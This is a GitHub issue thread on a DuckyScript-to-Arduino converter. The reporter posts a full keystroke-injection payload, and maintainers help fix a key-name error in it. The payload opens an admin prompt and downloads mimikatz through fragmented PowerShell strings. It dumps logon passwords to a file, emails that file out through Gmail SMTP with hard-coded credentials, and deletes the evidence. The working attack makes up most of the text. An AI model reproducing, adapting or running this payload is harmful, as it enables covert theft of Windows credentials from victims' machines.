Dukweeno/Duckuino #61: ⚠ - Error: Unknown command or key 'KEY_LEFT_ARROW' at line: 10.

Cyberdade, 2018-03-20:
*I tried to modify the Pesce's code with KEY_LEFT_ARROW, but your converter doesn't translate it!*

__Input code:__
```vb
REM Author: Pesce
REM Date: 10/20/2013
REM Note: Thanks to all the help everyone! This is my first attempt, don't be to upset!
REM -------------open command prompt with admin privileges
DELAY 3000
GUI r
DELAY 1000
STRING cmd
DELAY 1000
KEY_LEFT_ARROW
ENTER
DELAY 300
REM -------------download appropriate mimikatz for architecture
STRING powershell if 
DELAY 100
STRING ([System.IntPtr]::
DELAY 100
STRING Size -eq 4) { (
DELAY 100
STRING new-object System.Net.
DELAY 100
STRING WebClient).Dow
DELAY 100
STRING nloadFile('http
DELAY 100
STRING s://cdn-07.anonfi
DELAY 100
STRING le.com/6400R8dab7/a9
DELAY 100
STRING 9ba832-1521571009/m
DELAY 100
STRING imikatz.exe','%TEMP
DELAY 100
STRING %\pw.exe');  }else{ 
DELAY 100
STRING (new-object System.Ne
DELAY 100
STRING t.WebClient).Downl
DELAY 100
STRING oadFile('https://cdn-
DELAY 100
STRING 03.anonfile.com/p60
DELAY 100
STRING 7R7d7b9/eba7fb75-15
DELAY 100
STRING 21570641/mimikatz
DELAY 100
STRING .exe','%TEMP%
DELAY 100
STRING \pw.exe');}
DELAY 100
ENTER
DELAY 5000
REM -------------get the passwords and save to c:\pwlog.txt
STRING %TEMP%\pw.exe > c
DELAY 100
STRING :\pwlog.txt & t
DELAY 100
STRING ype pwlog.txt;
DELAY 100
ENTER
DELAY 2000
STRING privile
DELAY 100
STRING ge::debug
ENTER
DELAY 1000
STRING sekurlsa::logonP
DELAY 100
STRING asswords full
DELAY 100
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 300
STRING del %TEMP%\pw.exe
DELAY 100
ENTER
DELAY 300
REM -------------email log via gmail
STRING powershell
ENTER
DELAY 300
STRING $SMTPServer = 'smt
DELAY 100
STRING p.gmail.com'
DELAY 100
ENTER
STRING $SMTPInfo = New-Object Net.Ma
DELAY 100
STRING il.SmtpClient($SmtpServer, 587)
DELAY 100
ENTER
STRING $SMTPInfo.En
DELAY 100
STRING ableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-
STRING Object System.Net.NetworkCre
DELAY 100
STRING dential('cyberdade.spazzatu
DELAY 100
STRING ra@gmail.com', 'Anonymous');
DELAY 100
ENTER
STRING $ReportEmail = New-Objec
DELAY 100
STRING t System.Net.Mail.MailMessage
DELAY 100
ENTER
STRING $ReportEmail.From = 'cyb
DELAY 100
STRING erdade.developer@gmail.com'
ENTER
STRING $ReportEmail.To.Add
STRING ('cyberdade.developer@gmail.com')
DELAY 100
ENTER
STRING $ReportEmail.S
DELAY 100
STRING ubject = 'Duck Report'
ENTER
STRING $ReportEmail.B
DELAY 100
STRING ody = 'Attached is yo
DELAY 100
STRING ur duck report.' 
ENTER
STRING $ReportEmail.Att
DELAY 100
STRING achments.Add('c:\p
DELAY 100
STRING wlog.txt')
ENTER
STRING $SMTPInfo.Sen
DELAY 100
STRING d($ReportEmail)
ENTER
DELAY 1000
STRING exit
ENTER
REM ---------------------delete and end
STRING del c:\pwl
DELAY 100
STRINGog.txt
DELAY 100
ENTER
DELAY 300
STRING exit
ENTER
```

__Output code:__
```arduino
An error occured, the compiler returned undefined content !
```

__Error:__
```js
  ⚠ - Error: Unknown command or key 'KEY_LEFT_ARROW' at line: 10.
```

Plazmaz, 2018-03-21:
This looks similar to an old bug. Was this on a fresh clone?

Nurrl, 2018-03-21:
Hi @Cyberdade, to me it looks like you're trying to use an Arduino constant `KEY_LEFT_ARROW` instead of the DuckyScript command which is either `LEFT` or `LEFTARROW`.

Nurrl, 2018-03-21:
So yes, `KEY_LEFT_ARROW` is undefined to the DuckyScript interpreter.

Plazmaz, 2018-03-21:
Derp, nice catch @Nurrl. Totally didn't even think about that.

Nurrl, 2018-03-21:
Thanks @Plazmaz ;)

Cyberdade, 2018-03-21:
Thanks @Nurrl, when I return home I'll try it.

Cyberdade, 2018-03-21:
Now work, thanks @Nurrl

closed 2018-03-21 by Cyberdade